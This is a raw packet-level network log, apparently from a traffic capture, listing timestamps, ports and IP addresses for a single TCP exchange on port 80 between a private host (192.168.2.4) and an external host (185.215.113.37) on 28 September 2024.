Sep 28, 2024 21:26:16.808247089 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808257103 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808267117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808284044 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808295965 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808307886 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.808339119 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.808368921 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.808434963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808445930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808454037 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808487892 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.808487892 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.808563948 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808573008 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808582067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808594942 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808604956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808607101 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.808626890 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.808650970 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.808815002 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808825016 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808834076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808844090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808851004 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.808852911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808864117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.808877945 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.808877945 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.808908939 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809094906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809106112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809114933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809123993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809133053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809144974 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809149027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809181929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809181929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809216976 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809324026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809333086 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809367895 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809398890 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809417963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809428930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809468985 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809505939 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809515953 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809525013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809534073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809546947 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809576988 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809643030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809653997 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809686899 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809706926 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809710026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809751987 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809778929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809788942 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809828997 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.809925079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809935093 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809943914 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809952974 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809962988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.809978962 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810009003 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810009003 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810055017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810100079 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810170889 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810182095 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810190916 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810200930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810210943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810221910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810223103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810223103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810233116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810249090 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810280085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810280085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810477972 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810487032 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810494900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810504913 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810519934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810523033 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810529947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810540915 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810545921 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810551882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810561895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810571909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.810573101 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810573101 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810596943 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810620070 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.810992956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811005116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811013937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811023951 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811033964 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811042070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811048985 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811057091 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811069012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811070919 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811079979 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811091900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811096907 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811096907 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811120033 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811139107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811431885 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811441898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811450958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811459064 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811467886 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811477900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811492920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811501980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811505079 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811505079 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811511993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811522007 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811531067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811534882 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811534882 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811562061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811846018 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811860085 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811867952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811877012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811887026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811897039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.811902046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811935902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811935902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.811970949 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812086105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812096119 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812104940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812114954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812124968 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812136889 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812170029 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812170029 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812338114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812347889 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812364101 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812374115 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812383890 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812391043 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812393904 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812405109 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812410116 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812413931 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812431097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812432051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812450886 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812470913 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812762976 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812772036 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812783003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812792063 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812800884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812809944 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812809944 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812822104 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.812829971 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812854052 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.812884092 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.900335073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900391102 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900402069 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900425911 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.900461912 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.900461912 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.900479078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900490046 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900527000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.900557041 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900567055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900602102 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.900602102 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.900633097 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.900708914 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900717974 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900727034 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900737047 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900746107 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900755882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900759935 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900765896 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.900860071 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.900860071 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.900904894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.900954008 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.901046991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901058912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901067019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901077032 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901087046 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901097059 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901101112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901107073 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.901112080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901124954 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.901171923 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.901171923 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.901320934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901329994 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901367903 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.901387930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901397943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901431084 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.901463032 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.901513100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901524067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901532888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901541948 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901576996 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.901922941 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901932955 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901941061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901947975 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.901949883 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901961088 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.901967049 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.901990891 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902013063 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902015924 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902023077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902038097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902055025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902106047 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902106047 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902208090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902216911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902221918 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902226925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902254105 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902302027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902339935 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902349949 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902359009 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902369022 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902378082 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902389050 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902390957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902390957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902399063 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902424097 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902451992 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902637005 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902647972 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902698040 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902700901 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902708054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902738094 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902767897 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902832031 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902841091 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902849913 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902861118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902868986 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902879953 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.902882099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902882099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902918100 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.902918100 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903143883 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903152943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903162003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903168917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903182030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903187037 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903191090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903196096 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903201103 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903211117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903214931 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903214931 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903214931 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903254986 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903502941 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903512955 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903522015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903526068 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903556108 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903587103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903661966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903671980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903714895 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903753996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903764009 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903772116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903781891 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903791904 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903796911 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903804064 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903815985 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903815985 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903827906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903837919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.903853893 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903853893 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.903875113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.904225111 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904234886 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904243946 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904259920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904273987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904284000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904284954 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.904284954 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.904297113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904308081 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904318094 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.904318094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904329062 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904339075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904354095 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904355049 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.904355049 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.904364109 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904376984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.904378891 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.904397011 CEST	49732	80	192.168.2.4	185.215.113.37
